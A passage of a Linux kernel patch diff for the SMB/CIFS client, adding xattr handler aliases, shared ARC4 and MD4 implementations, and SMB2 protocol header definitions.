++static const struct xattr_handler cifs_cifs_acl_xattr_handler = {
++	.name = CIFS_XATTR_CIFS_ACL,
++	.flags = XATTR_CIFS_ACL,
++	.get = cifs_xattr_get,
++	.set = cifs_xattr_set,
++};
++
++/*
++ * Although this is just an alias for the above, need to move away from
++ * confusing users and using the 20 year old term 'cifs' when it is no
++ * longer secure and was replaced by SMB2/SMB3 a long time ago, and
++ * SMB3 and later are highly secure.
++ */
++static const struct xattr_handler smb3_acl_xattr_handler = {
++	.name = SMB3_XATTR_CIFS_ACL,
++	.flags = XATTR_CIFS_ACL,
++	.get = cifs_xattr_get,
++	.set = cifs_xattr_set,
++};
++
++static const struct xattr_handler cifs_cifs_ntsd_xattr_handler = {
++	.name = CIFS_XATTR_CIFS_NTSD,
++	.flags = XATTR_CIFS_NTSD,
++	.get = cifs_xattr_get,
++	.set = cifs_xattr_set,
++};
++
++/*
++ * Although this is just an alias for the above, need to move away from
++ * confusing users and using the 20 year old term 'cifs' when it is no
++ * longer secure and was replaced by SMB2/SMB3 a long time ago, and
++ * SMB3 and later are highly secure.
++ */
++static const struct xattr_handler smb3_ntsd_xattr_handler = {
++	.name = SMB3_XATTR_CIFS_NTSD,
++	.flags = XATTR_CIFS_NTSD,
++	.get = cifs_xattr_get,
++	.set = cifs_xattr_set,
++};
++
++static const struct xattr_handler cifs_cifs_ntsd_full_xattr_handler = {
++	.name = CIFS_XATTR_CIFS_NTSD_FULL,
++	.flags = XATTR_CIFS_NTSD_FULL,
++	.get = cifs_xattr_get,
++	.set = cifs_xattr_set,
++};
++
++/*
++ * Although this is just an alias for the above, need to move away from
++ * confusing users and using the 20 year old term 'cifs' when it is no
++ * longer secure and was replaced by SMB2/SMB3 a long time ago, and
++ * SMB3 and later are highly secure.
++ */
++static const struct xattr_handler smb3_ntsd_full_xattr_handler = {
++	.name = SMB3_XATTR_CIFS_NTSD_FULL,
++	.flags = XATTR_CIFS_NTSD_FULL,
++	.get = cifs_xattr_get,
++	.set = cifs_xattr_set,
++};
++
++
++static const struct xattr_handler cifs_posix_acl_access_xattr_handler = {
++	.name = XATTR_NAME_POSIX_ACL_ACCESS,
++	.flags = XATTR_ACL_ACCESS,
++	.get = cifs_xattr_get,
++	.set = cifs_xattr_set,
++};
++
++static const struct xattr_handler cifs_posix_acl_default_xattr_handler = {
++	.name = XATTR_NAME_POSIX_ACL_DEFAULT,
++	.flags = XATTR_ACL_DEFAULT,
++	.get = cifs_xattr_get,
++	.set = cifs_xattr_set,
++};
++
++const struct xattr_handler *cifs_xattr_handlers[] = {
++	&cifs_user_xattr_handler,
++	&cifs_os2_xattr_handler,
++	&cifs_cifs_acl_xattr_handler,
++	&smb3_acl_xattr_handler, /* alias for above since avoiding "cifs" */
++	&cifs_cifs_ntsd_xattr_handler,
++	&smb3_ntsd_xattr_handler, /* alias for above since avoiding "cifs" */
++	&cifs_cifs_ntsd_full_xattr_handler,
++	&smb3_ntsd_full_xattr_handler, /* alias for above since avoiding "cifs" */
++	&cifs_posix_acl_access_xattr_handler,
++	&cifs_posix_acl_default_xattr_handler,
++	NULL
++};
+diff --git a/fs/smb/common/Makefile b/fs/smb/common/Makefile
+new file mode 100644
+index 0000000000000..c66dbbc1469c3
+--- /dev/null
++++ b/fs/smb/common/Makefile
+@@ -0,0 +1,7 @@
++# SPDX-License-Identifier: GPL-2.0-only
++#
++# Makefile for Linux filesystem routines that are shared by client and server.
++#
++
++obj-$(CONFIG_SMBFS) += cifs_arc4.o
++obj-$(CONFIG_SMBFS) += cifs_md4.o
+diff --git a/fs/smb/common/arc4.h b/fs/smb/common/arc4.h
+new file mode 100644
+index 0000000000000..12e71ec033a18
+--- /dev/null
++++ b/fs/smb/common/arc4.h
+@@ -0,0 +1,23 @@
++/* SPDX-License-Identifier: GPL-2.0+ */
++/*
++ * Common values for ARC4 Cipher Algorithm
++ */
++
++#ifndef _CRYPTO_ARC4_H
++#define _CRYPTO_ARC4_H
++
++#include <linux/types.h>
++
++#define ARC4_MIN_KEY_SIZE	1
++#define ARC4_MAX_KEY_SIZE	256
++#define ARC4_BLOCK_SIZE		1
++
++struct arc4_ctx {
++	u32 S[256];
++	u32 x, y;
++};
++
++int cifs_arc4_setkey(struct arc4_ctx *ctx, const u8 *in_key, unsigned int key_len);
++void cifs_arc4_crypt(struct arc4_ctx *ctx, u8 *out, const u8 *in, unsigned int len);
++
++#endif /* _CRYPTO_ARC4_H */
+diff --git a/fs/smb/common/cifs_arc4.c b/fs/smb/common/cifs_arc4.c
+new file mode 100644
+index 0000000000000..043e4cb839fa2
+--- /dev/null
++++ b/fs/smb/common/cifs_arc4.c
+@@ -0,0 +1,74 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ * Cryptographic API
++ *
++ * ARC4 Cipher Algorithm
++ *
++ * Jon Oberheide <jon@oberheide.org>
++ */
++
++#include <linux/module.h>
++#include "arc4.h"
++
++MODULE_LICENSE("GPL");
++
++int cifs_arc4_setkey(struct arc4_ctx *ctx, const u8 *in_key, unsigned int key_len)
++{
++	int i, j = 0, k = 0;
++
++	ctx->x = 1;
++	ctx->y = 0;
++
++	for (i = 0; i < 256; i++)
++		ctx->S[i] = i;
++
++	for (i = 0; i < 256; i++) {
++		u32 a = ctx->S[i];
++
++		j = (j + in_key[k] + a) & 0xff;
++		ctx->S[i] = ctx->S[j];
++		ctx->S[j] = a;
++		if (++k >= key_len)
++			k = 0;
++	}
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(cifs_arc4_setkey);
++
++void cifs_arc4_crypt(struct arc4_ctx *ctx, u8 *out, const u8 *in, unsigned int len)
++{
++	u32 *const S = ctx->S;
++	u32 x, y, a, b;
++	u32 ty, ta, tb;
++
++	if (len == 0)
++		return;
++
++	x = ctx->x;
++	y = ctx->y;
++
++	a = S[x];
++	y = (y + a) & 0xff;
++	b = S[y];
++
++	do {
++		S[y] = a;
++		a = (a + b) & 0xff;
++		S[x] = b;
++		x = (x + 1) & 0xff;
++		ta = S[x];
++		ty = (y + ta) & 0xff;
++		tb = S[ty];
++		*out++ = *in++ ^ S[a];
++		if (--len == 0)
++			break;
++		y = ty;
++		a = ta;
++		b = tb;
++	} while (true);
++
++	ctx->x = x;
++	ctx->y = y;
++}
++EXPORT_SYMBOL_GPL(cifs_arc4_crypt);
+diff --git a/fs/smb/common/cifs_md4.c b/fs/smb/common/cifs_md4.c
+new file mode 100644
+index 0000000000000..50f78cfc6ce92
+--- /dev/null
++++ b/fs/smb/common/cifs_md4.c
+@@ -0,0 +1,197 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ * Cryptographic API.
++ *
++ * MD4 Message Digest Algorithm (RFC1320).
++ *
++ * Implementation derived from Andrew Tridgell and Steve French's
++ * CIFS MD4 implementation, and the cryptoapi implementation
++ * originally based on the public domain implementation written
++ * by Colin Plumb in 1993.
++ *
++ * Copyright (c) Andrew Tridgell 1997-1998.
++ * Modified by Steve French (sfrench@us.ibm.com) 2002
++ * Copyright (c) Cryptoapi developers.
++ * Copyright (c) 2002 David S. Miller (davem@redhat.com)
++ * Copyright (c) 2002 James Morris <jmorris@intercode.com.au>
++ *
++ */
++#include <linux/init.h>
++#include <linux/kernel.h>
++#include <linux/module.h>
++#include <linux/string.h>
++#include <linux/types.h>
++#include <asm/byteorder.h>
++#include "md4.h"
++
++MODULE_LICENSE("GPL");
++
++static inline u32 lshift(u32 x, unsigned int s)
++{
++	x &= 0xFFFFFFFF;
++	return ((x << s) & 0xFFFFFFFF) | (x >> (32 - s));
++}
++
++static inline u32 F(u32 x, u32 y, u32 z)
++{
++	return (x & y) | ((~x) & z);
++}
++
++static inline u32 G(u32 x, u32 y, u32 z)
++{
++	return (x & y) | (x & z) | (y & z);
++}
++
++static inline u32 H(u32 x, u32 y, u32 z)
++{
++	return x ^ y ^ z;
++}
++
++#define ROUND1(a,b,c,d,k,s) (a = lshift(a + F(b,c,d) + k, s))
++#define ROUND2(a,b,c,d,k,s) (a = lshift(a + G(b,c,d) + k + (u32)0x5A827999,s))
++#define ROUND3(a,b,c,d,k,s) (a = lshift(a + H(b,c,d) + k + (u32)0x6ED9EBA1,s))
++
++static void md4_transform(u32 *hash, u32 const *in)
++{
++	u32 a, b, c, d;
++
++	a = hash[0];
++	b = hash[1];
++	c = hash[2];
++	d = hash[3];
++
++	ROUND1(a, b, c, d, in[0], 3);
++	ROUND1(d, a, b, c, in[1], 7);
++	ROUND1(c, d, a, b, in[2], 11);
++	ROUND1(b, c, d, a, in[3], 19);
++	ROUND1(a, b, c, d, in[4], 3);
++	ROUND1(d, a, b, c, in[5], 7);
++	ROUND1(c, d, a, b, in[6], 11);
++	ROUND1(b, c, d, a, in[7], 19);
++	ROUND1(a, b, c, d, in[8], 3);
++	ROUND1(d, a, b, c, in[9], 7);
++	ROUND1(c, d, a, b, in[10], 11);
++	ROUND1(b, c, d, a, in[11], 19);
++	ROUND1(a, b, c, d, in[12], 3);
++	ROUND1(d, a, b, c, in[13], 7);
++	ROUND1(c, d, a, b, in[14], 11);
++	ROUND1(b, c, d, a, in[15], 19);
++
++	ROUND2(a, b, c, d, in[0], 3);
++	ROUND2(d, a, b, c, in[4], 5);
++	ROUND2(c, d, a, b, in[8], 9);
++	ROUND2(b, c, d, a, in[12], 13);
++	ROUND2(a, b, c, d, in[1], 3);
++	ROUND2(d, a, b, c, in[5], 5);
++	ROUND2(c, d, a, b, in[9], 9);
++	ROUND2(b, c, d, a, in[13], 13);
++	ROUND2(a, b, c, d, in[2], 3);
++	ROUND2(d, a, b, c, in[6], 5);
++	ROUND2(c, d, a, b, in[10], 9);
++	ROUND2(b, c, d, a, in[14], 13);
++	ROUND2(a, b, c, d, in[3], 3);
++	ROUND2(d, a, b, c, in[7], 5);
++	ROUND2(c, d, a, b, in[11], 9);
++	ROUND2(b, c, d, a, in[15], 13);
++
++	ROUND3(a, b, c, d, in[0], 3);
++	ROUND3(d, a, b, c, in[8], 9);
++	ROUND3(c, d, a, b, in[4], 11);
++	ROUND3(b, c, d, a, in[12], 15);
++	ROUND3(a, b, c, d, in[2], 3);
++	ROUND3(d, a, b, c, in[10], 9);
++	ROUND3(c, d, a, b, in[6], 11);
++	ROUND3(b, c, d, a, in[14], 15);
++	ROUND3(a, b, c, d, in[1], 3);
++	ROUND3(d, a, b, c, in[9], 9);
++	ROUND3(c, d, a, b, in[5], 11);
++	ROUND3(b, c, d, a, in[13], 15);
++	ROUND3(a, b, c, d, in[3], 3);
++	ROUND3(d, a, b, c, in[11], 9);
++	ROUND3(c, d, a, b, in[7], 11);
++	ROUND3(b, c, d, a, in[15], 15);
++
++	hash[0] += a;
++	hash[1] += b;
++	hash[2] += c;
++	hash[3] += d;
++}
++
++static inline void md4_transform_helper(struct md4_ctx *ctx)
++{
++	le32_to_cpu_array(ctx->block, ARRAY_SIZE(ctx->block));
++	md4_transform(ctx->hash, ctx->block);
++}
++
++int cifs_md4_init(struct md4_ctx *mctx)
++{
++	memset(mctx, 0, sizeof(struct md4_ctx));
++	mctx->hash[0] = 0x67452301;
++	mctx->hash[1] = 0xefcdab89;
++	mctx->hash[2] = 0x98badcfe;
++	mctx->hash[3] = 0x10325476;
++	mctx->byte_count = 0;
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(cifs_md4_init);
++
++int cifs_md4_update(struct md4_ctx *mctx, const u8 *data, unsigned int len)
++{
++	const u32 avail = sizeof(mctx->block) - (mctx->byte_count & 0x3f);
++
++	mctx->byte_count += len;
++
++	if (avail > len) {
++		memcpy((char *)mctx->block + (sizeof(mctx->block) - avail),
++		       data, len);
++		return 0;
++	}
++
++	memcpy((char *)mctx->block + (sizeof(mctx->block) - avail),
++	       data, avail);
++
++	md4_transform_helper(mctx);
++	data += avail;
++	len -= avail;
++
++	while (len >= sizeof(mctx->block)) {
++		memcpy(mctx->block, data, sizeof(mctx->block));
++		md4_transform_helper(mctx);
++		data += sizeof(mctx->block);
++		len -= sizeof(mctx->block);
++	}
++
++	memcpy(mctx->block, data, len);
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(cifs_md4_update);
++
++int cifs_md4_final(struct md4_ctx *mctx, u8 *out)
++{
++	const unsigned int offset = mctx->byte_count & 0x3f;
++	char *p = (char *)mctx->block + offset;
++	int padding = 56 - (offset + 1);
++
++	*p++ = 0x80;
++	if (padding < 0) {
++		memset(p, 0x00, padding + sizeof(u64));
++		md4_transform_helper(mctx);
++		p = (char *)mctx->block;
++		padding = 56;
++	}
++
++	memset(p, 0, padding);
++	mctx->block[14] = mctx->byte_count << 3;
++	mctx->block[15] = mctx->byte_count >> 29;
++	le32_to_cpu_array(mctx->block, (sizeof(mctx->block) -
++			  sizeof(u64)) / sizeof(u32));
++	md4_transform(mctx->hash, mctx->block);
++	cpu_to_le32_array(mctx->hash, ARRAY_SIZE(mctx->hash));
++	memcpy(out, mctx->hash, sizeof(mctx->hash));
++	memset(mctx, 0, sizeof(*mctx));
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(cifs_md4_final);
+diff --git a/fs/smb/common/md4.h b/fs/smb/common/md4.h
+new file mode 100644
+index 0000000000000..5337becc699ab
+--- /dev/null
++++ b/fs/smb/common/md4.h
+@@ -0,0 +1,27 @@
++/* SPDX-License-Identifier: GPL-2.0+ */
++/*
++ * Common values for ARC4 Cipher Algorithm
++ */
++
++#ifndef _CIFS_MD4_H
++#define _CIFS_MD4_H
++
++#include <linux/types.h>
++
++#define MD4_DIGEST_SIZE		16
++#define MD4_HMAC_BLOCK_SIZE	64
++#define MD4_BLOCK_WORDS		16
++#define MD4_HASH_WORDS		4
++
++struct md4_ctx {
++	u32 hash[MD4_HASH_WORDS];
++	u32 block[MD4_BLOCK_WORDS];
++	u64 byte_count;
++};
++
++
++int cifs_md4_init(struct md4_ctx *mctx);
++int cifs_md4_update(struct md4_ctx *mctx, const u8 *data, unsigned int len);
++int cifs_md4_final(struct md4_ctx *mctx, u8 *out);
++
++#endif /* _CIFS_MD4_H */
+diff --git a/fs/smb/common/smb2pdu.h b/fs/smb/common/smb2pdu.h
+new file mode 100644
+index 0000000000000..7d605db3bb3b9
+--- /dev/null
++++ b/fs/smb/common/smb2pdu.h
+@@ -0,0 +1,1702 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++#ifndef _COMMON_SMB2PDU_H
++#define _COMMON_SMB2PDU_H
++
++/*
++ * Note that, due to trying to use names similar to the protocol specifications,
++ * there are many mixed case field names in the structures below.  Although
++ * this does not match typical Linux kernel style, it is necessary to be
++ * able to match against the protocol specfication.
++ *
++ * SMB2 commands
++ * Some commands have minimal (wct=0,bcc=0), or uninteresting, responses
++ * (ie no useful data other than the SMB error code itself) and are marked such.
++ * Knowing this helps avoid response buffer allocations and copy in some cases.
++ */
++
++/* List of commands in host endian */
++#define SMB2_NEGOTIATE_HE	0x0000
++#define SMB2_SESSION_SETUP_HE	0x0001
++#define SMB2_LOGOFF_HE		0x0002 /* trivial request/resp */
++#define SMB2_TREE_CONNECT_HE	0x0003
++#define SMB2_TREE_DISCONNECT_HE	0x0004 /* trivial req/resp */
++#define SMB2_CREATE_HE		0x0005
++#define SMB2_CLOSE_HE		0x0006
++#define SMB2_FLUSH_HE		0x0007 /* trivial resp */
++#define SMB2_READ_HE		0x0008
++#define SMB2_WRITE_HE		0x0009
++#define SMB2_LOCK_HE		0x000A
++#define SMB2_IOCTL_HE		0x000B
++#define SMB2_CANCEL_HE		0x000C
++#define SMB2_ECHO_HE		0x000D
++#define SMB2_QUERY_DIRECTORY_HE	0x000E
++#define SMB2_CHANGE_NOTIFY_HE	0x000F
++#define SMB2_QUERY_INFO_HE	0x0010
++#define SMB2_SET_INFO_HE	0x0011
++#define SMB2_OPLOCK_BREAK_HE	0x0012
++
++/* The same list in little endian */
++#define SMB2_NEGOTIATE		cpu_to_le16(SMB2_NEGOTIATE_HE)
++#define SMB2_SESSION_SETUP	cpu_to_le16(SMB2_SESSION_SETUP_HE)
++#define SMB2_LOGOFF		cpu_to_le16(SMB2_LOGOFF_HE)
++#define SMB2_TREE_CONNECT	cpu_to_le16(SMB2_TREE_CONNECT_HE)
++#define SMB2_TREE_DISCONNECT	cpu_to_le16(SMB2_TREE_DISCONNECT_HE)
++#define SMB2_CREATE		cpu_to_le16(SMB2_CREATE_HE)
++#define SMB2_CLOSE		cpu_to_le16(SMB2_CLOSE_HE)
++#define SMB2_FLUSH		cpu_to_le16(SMB2_FLUSH_HE)
++#define SMB2_READ		cpu_to_le16(SMB2_READ_HE)
++#define SMB2_WRITE		cpu_to_le16(SMB2_WRITE_HE)
++#define SMB2_LOCK		cpu_to_le16(SMB2_LOCK_HE)
++#define SMB2_IOCTL		cpu_to_le16(SMB2_IOCTL_HE)
++#define SMB2_CANCEL		cpu_to_le16(SMB2_CANCEL_HE)
++#define SMB2_ECHO		cpu_to_le16(SMB2_ECHO_HE)
++#define SMB2_QUERY_DIRECTORY	cpu_to_le16(SMB2_QUERY_DIRECTORY_HE)
++#define SMB2_CHANGE_NOTIFY	cpu_to_le16(SMB2_CHANGE_NOTIFY_HE)
++#define SMB2_QUERY_INFO		cpu_to_le16(SMB2_QUERY_INFO_HE)
++#define SMB2_SET_INFO		cpu_to_le16(SMB2_SET_INFO_HE)
++#define SMB2_OPLOCK_BREAK	cpu_to_le16(SMB2_OPLOCK_BREAK_HE)
++
++#define SMB2_INTERNAL_CMD	cpu_to_le16(0xFFFF)
++
++#define NUMBER_OF_SMB2_COMMANDS	0x0013
++
++/*
++ * Size of the session key (crypto key encrypted with the password
++ */
++#define SMB2_NTLMV2_SESSKEY_SIZE	16
++#define SMB2_SIGNATURE_SIZE		16
++#define SMB2_HMACSHA256_SIZE		32
++#define SMB2_CMACAES_SIZE		16
++#define SMB3_GCM128_CRYPTKEY_SIZE	16
++#define SMB3_GCM256_CRYPTKEY_SIZE	32
++
++/*
++ * Size of the smb3 encryption/decryption keys
++ * This size is big enough to store any cipher key types.
++ */
++#define SMB3_ENC_DEC_KEY_SIZE		32
++
++/*
++ * Size of the smb3 signing key
++ */
++#define SMB3_SIGN_KEY_SIZE		16
++
++#define CIFS_CLIENT_CHALLENGE_SIZE	8
++
++/* Maximum buffer size value we can send with 1 credit */
++#define SMB2_MAX_BUFFER_SIZE 65536
++
++/*
++ * The default wsize is 1M for SMB2 (and for some CIFS cases).
++ * find_get_pages seems to return a maximum of 256
++ * pages in a single call. With PAGE_SIZE == 4k, this means we can
++ * fill a single wsize request with a single call.
++ */
++#define SMB3_DEFAULT_IOSIZE (4 * 1024 * 1024)
++
++/*
++ * SMB2 Header Definition
++ *
++ * "MBZ" :  Must be Zero
++ * "BB"  :  BugBug, Something to check/review/analyze later
++ * "PDU" :  "Protocol Data Unit" (ie a network "frame")
++ *
++ */
++
++#define __SMB2_HEADER_STRUCTURE_SIZE	64
++#define SMB2_HEADER_STRUCTURE_SIZE				\
++	cpu_to_le16(__SMB2_HEADER_STRUCTURE_SIZE)
++
++#define SMB2_PROTO_NUMBER cpu_to_le32(0x424d53fe)
++#define SMB2_TRANSFORM_PROTO_NUM cpu_to_le32(0x424d53fd)
++#define SMB2_COMPRESSION_TRANSFORM_ID cpu_to_le32(0x424d53fc)
++
++/*
++ *	SMB2 flag definitions
++ */
++#define SMB2_FLAGS_SERVER_TO_REDIR	cpu_to_le32(0x00000001)
++#define SMB2_FLAGS_ASYNC_COMMAND	cpu_to_le32(0x00000002)
++#define SMB2_FLAGS_RELATED_OPERATIONS	cpu_to_le32(0x00000004)
++#define SMB2_FLAGS_SIGNED		cpu_to_le32(0x00000008)
++#define SMB2_FLAGS_PRIORITY_MASK	cpu_to_le32(0x00000070) /* SMB3.1.1 */
++#define SMB2_FLAGS_DFS_OPERATIONS	cpu_to_le32(0x10000000)
++#define SMB2_FLAGS_REPLAY_OPERATION	cpu_to_le32(0x20000000) /* SMB3 & up */
++
++/*
++ *	Definitions for SMB2 Protocol Data Units (network frames)
++ *
++ *  See MS-SMB2.PDF specification for protocol details.
++ *  The Naming convention is the lower case version of the SMB2
++ *  command code name for the struct. Note that structures must be packed.
++ *
++ */
++
++/* See MS-SMB2 section 2.2.1 */
++struct smb2_hdr {
++	__le32 ProtocolId;	/* 0xFE 'S' 'M' 'B' */
++	__le16 StructureSize;	/* 64 */
++	__le16 CreditCharge;	/* MBZ */
++	__le32 Status;		/* Error from server */
++	__le16 Command;
++	__le16 CreditRequest;	/* CreditResponse */
++	__le32 Flags;
++	__le32 NextCommand;
++	__le64 MessageId;
++	union {
++		struct {
++			__le32 ProcessId;
++			__le32  TreeId;
++		} __packed SyncId;
++		__le64  AsyncId;
++	} __packed Id;
++	__le64  SessionId;
++	__u8   Signature[16];
++} __packed;
++
++struct smb2_pdu {
++	struct smb2_hdr hdr;
++	__le16 StructureSize2; /* size of wct area (varies, request specific) */
++} __packed;
++
++#define SMB2_ERROR_STRUCTURE_SIZE2	9
++#define SMB2_ERROR_STRUCTURE_SIZE2_LE	cpu_to_le16(SMB2_ERROR_STRUCTURE_SIZE2)
++
++struct smb2_err_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;
++	__u8   ErrorContextCount;
++	__u8   Reserved;
++	__le32 ByteCount;  /* even if zero, at least one byte follows */
++	__u8   ErrorData[1];  /* variable length */
++} __packed;
++
++#define SMB3_AES_CCM_NONCE 11
++#define SMB3_AES_GCM_NONCE 12
++
++/* Transform flags (for 3.0 dialect this flag indicates CCM */
++#define TRANSFORM_FLAG_ENCRYPTED	0x0001
++struct smb2_transform_hdr {
++	__le32 ProtocolId;	/* 0xFD 'S' 'M' 'B' */
++	__u8   Signature[16];
++	__u8   Nonce[16];
++	__le32 OriginalMessageSize;
++	__u16  Reserved1;
++	__le16 Flags; /* EncryptionAlgorithm for 3.0, enc enabled for 3.1.1 */
++	__le64  SessionId;
++} __packed;
++
++
++/* See MS-SMB2 2.2.42 */
++struct smb2_compression_transform_hdr_unchained {
++	__le32 ProtocolId;	/* 0xFC 'S' 'M' 'B' */
++	__le32 OriginalCompressedSegmentSize;
++	__le16 CompressionAlgorithm;
++	__le16 Flags;
++	__le16 Length; /* if chained it is length, else offset */
++} __packed;
++
++/* See MS-SMB2 2.2.42.1 */
++#define SMB2_COMPRESSION_FLAG_NONE	0x0000
++#define SMB2_COMPRESSION_FLAG_CHAINED	0x0001
++
++struct compression_payload_header {
++	__le16	CompressionAlgorithm;
++	__le16	Flags;
++	__le32	Length; /* length of compressed playload including field below if present */
++	/* __le32 OriginalPayloadSize; */ /* optional, present when LZNT1, LZ77, LZ77+Huffman */
++} __packed;
++
++/* See MS-SMB2 2.2.42.2 */
++struct smb2_compression_transform_hdr_chained {
++	__le32 ProtocolId;	/* 0xFC 'S' 'M' 'B' */
++	__le32 OriginalCompressedSegmentSize;
++	/* struct compression_payload_header[] */
++} __packed;
++
++/* See MS-SMB2 2.2.42.2.2 */
++struct compression_pattern_payload_v1 {
++	__le16	Pattern;
++	__le16	Reserved1;
++	__le16	Reserved2;
++	__le32	Repetitions;
++} __packed;
++
++/* See MS-SMB2 section 2.2.9.2 */
++/* Context Types */
++#define SMB2_RESERVED_TREE_CONNECT_CONTEXT_ID 0x0000
++#define SMB2_REMOTED_IDENTITY_TREE_CONNECT_CONTEXT_ID cpu_to_le16(0x0001)
++
++struct tree_connect_contexts {
++	__le16 ContextType;
++	__le16 DataLength;
++	__le32 Reserved;
++	__u8   Data[];
++} __packed;
++
++/* Remoted identity tree connect context structures - see MS-SMB2 2.2.9.2.1 */
++struct smb3_blob_data {
++	__le16 BlobSize;
++	__u8   BlobData[];
++} __packed;
++
++/* Valid values for Attr */
++#define SE_GROUP_MANDATORY		0x00000001
++#define SE_GROUP_ENABLED_BY_DEFAULT	0x00000002
++#define SE_GROUP_ENABLED		0x00000004
++#define SE_GROUP_OWNER			0x00000008
++#define SE_GROUP_USE_FOR_DENY_ONLY	0x00000010
++#define SE_GROUP_INTEGRITY		0x00000020
++#define SE_GROUP_INTEGRITY_ENABLED	0x00000040
++#define SE_GROUP_RESOURCE		0x20000000
++#define SE_GROUP_LOGON_ID		0xC0000000
++
++/* struct sid_attr_data is SidData array in BlobData format then le32 Attr */
++
++struct sid_array_data {
++	__le16 SidAttrCount;
++	/* SidAttrList - array of sid_attr_data structs */
++} __packed;
++
++struct luid_attr_data {
++
++} __packed;
++
++/*
++ * struct privilege_data is the same as BLOB_DATA - see MS-SMB2 2.2.9.2.1.5
++ * but with size of LUID_ATTR_DATA struct and BlobData set to LUID_ATTR DATA
++ */
++
++struct privilege_array_data {
++	__le16 PrivilegeCount;
++	/* array of privilege_data structs */
++} __packed;
++
++struct remoted_identity_tcon_context {
++	__le16 TicketType; /* must be 0x0001 */
++	__le16 TicketSize; /* total size of this struct */
++	__le16 User; /* offset to SID_ATTR_DATA struct with user info */
++	__le16 UserName; /* offset to null terminated Unicode username string */
++	__le16 Domain; /* offset to null terminated Unicode domain name */
++	__le16 Groups; /* offset to SID_ARRAY_DATA struct with group info */
++	__le16 RestrictedGroups; /* similar to above */
++	__le16 Privileges; /* offset to PRIVILEGE_ARRAY_DATA struct */
++	__le16 PrimaryGroup; /* offset to SID_ARRAY_DATA struct */
++	__le16 Owner; /* offset to BLOB_DATA struct */
++	__le16 DefaultDacl; /* offset to BLOB_DATA struct */
++	__le16 DeviceGroups; /* offset to SID_ARRAY_DATA struct */
++	__le16 UserClaims; /* offset to BLOB_DATA struct */
++	__le16 DeviceClaims; /* offset to BLOB_DATA struct */
++	__u8   TicketInfo[]; /* variable length buf - remoted identity data */
++} __packed;
++
++struct smb2_tree_connect_req_extension {
++	__le32 TreeConnectContextOffset;
++	__le16 TreeConnectContextCount;
++	__u8  Reserved[10];
++	__u8  PathName[]; /* variable sized array */
++	/* followed by array of TreeConnectContexts */
++} __packed;
++
++/* Flags/Reserved for SMB3.1.1 */
++#define SMB2_TREE_CONNECT_FLAG_CLUSTER_RECONNECT cpu_to_le16(0x0001)
++#define SMB2_TREE_CONNECT_FLAG_REDIRECT_TO_OWNER cpu_to_le16(0x0002)
++#define SMB2_TREE_CONNECT_FLAG_EXTENSION_PRESENT cpu_to_le16(0x0004)
++
++struct smb2_tree_connect_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 9 */
++	__le16 Flags;		/* Flags in SMB3.1.1 */
++	__le16 PathOffset;
++	__le16 PathLength;
++	__u8   Buffer[1];	/* variable length */
++} __packed;
++
++/* Possible ShareType values */
++#define SMB2_SHARE_TYPE_DISK	0x01
++#define SMB2_SHARE_TYPE_PIPE	0x02
++#define	SMB2_SHARE_TYPE_PRINT	0x03
++
++/*
++ * Possible ShareFlags - exactly one and only one of the first 4 caching flags
++ * must be set (any of the remaining, SHI1005, flags may be set individually
++ * or in combination.
++ */
++#define SMB2_SHAREFLAG_MANUAL_CACHING			0x00000000
++#define SMB2_SHAREFLAG_AUTO_CACHING			0x00000010
++#define SMB2_SHAREFLAG_VDO_CACHING			0x00000020
++#define SMB2_SHAREFLAG_NO_CACHING			0x00000030
++#define SHI1005_FLAGS_DFS				0x00000001
++#define SHI1005_FLAGS_DFS_ROOT				0x00000002
++#define SHI1005_FLAGS_RESTRICT_EXCLUSIVE_OPENS		0x00000100
++#define SHI1005_FLAGS_FORCE_SHARED_DELETE		0x00000200
++#define SHI1005_FLAGS_ALLOW_NAMESPACE_CACHING		0x00000400
++#define SHI1005_FLAGS_ACCESS_BASED_DIRECTORY_ENUM	0x00000800
++#define SHI1005_FLAGS_FORCE_LEVELII_OPLOCK		0x00001000
++#define SHI1005_FLAGS_ENABLE_HASH_V1			0x00002000
++#define SHI1005_FLAGS_ENABLE_HASH_V2			0x00004000
++#define SHI1005_FLAGS_ENCRYPT_DATA			0x00008000
++#define SMB2_SHAREFLAG_IDENTITY_REMOTING		0x00040000 /* 3.1.1 */
++#define SMB2_SHAREFLAG_COMPRESS_DATA			0x00100000 /* 3.1.1 */
++#define SHI1005_FLAGS_ALL				0x0014FF33
++
++/* Possible share capabilities */
++#define SMB2_SHARE_CAP_DFS	cpu_to_le32(0x00000008) /* all dialects */
++#define SMB2_SHARE_CAP_CONTINUOUS_AVAILABILITY cpu_to_le32(0x00000010) /* 3.0 */
++#define SMB2_SHARE_CAP_SCALEOUT	cpu_to_le32(0x00000020) /* 3.0 */
++#define SMB2_SHARE_CAP_CLUSTER	cpu_to_le32(0x00000040) /* 3.0 */
++#define SMB2_SHARE_CAP_ASYMMETRIC cpu_to_le32(0x00000080) /* 3.02 */
++#define SMB2_SHARE_CAP_REDIRECT_TO_OWNER cpu_to_le32(0x00000100) /* 3.1.1 */
++
++struct smb2_tree_connect_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 16 */
++	__u8   ShareType;	/* see below */
++	__u8   Reserved;
++	__le32 ShareFlags;	/* see below */
++	__le32 Capabilities;	/* see below */
++	__le32 MaximalAccess;
++} __packed;
++
++struct smb2_tree_disconnect_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 4 */
++	__le16 Reserved;
++} __packed;
++
++struct smb2_tree_disconnect_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 4 */
++	__le16 Reserved;
++} __packed;
++
++
++/*
++ * SMB2_NEGOTIATE_PROTOCOL  See MS-SMB2 section 2.2.3
++ */
++/* SecurityMode flags */
++#define	SMB2_NEGOTIATE_SIGNING_ENABLED     0x0001
++#define	SMB2_NEGOTIATE_SIGNING_ENABLED_LE  cpu_to_le16(0x0001)
++#define SMB2_NEGOTIATE_SIGNING_REQUIRED	   0x0002
++#define SMB2_NEGOTIATE_SIGNING_REQUIRED_LE cpu_to_le16(0x0002)
